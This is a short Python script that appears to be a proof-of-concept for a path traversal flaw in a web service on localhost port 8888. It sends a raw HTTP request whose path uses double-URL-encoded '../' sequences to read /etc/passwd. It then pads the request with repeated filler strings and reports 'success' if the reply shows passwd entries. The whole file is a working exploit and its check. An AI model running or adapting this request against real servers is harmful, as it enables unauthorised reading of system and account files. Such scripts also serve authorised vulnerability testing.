import socket
import time
sock = socket.socket()
sock.connect(("127.0.0.1",8888))
sock.send('GET /foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd HTTP/1.0\r\n'.encode('ascii'))
sock.send('Host: 127.0.0.1\r\n'.encode('ascii'))
sock.send('\r\n'.encode('ascii'))
# sock.send('\r\n'.encode('ascii'))
str_five = 'testssdfsf' * 200
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
chunk = sock.recv(4096)
sock.close()
result = str(chunk,encoding='utf-8')
print(result)
if  "bin" in result and "/usr/sbin" in result and "root" in result:
    print("VerifyInfo : success")
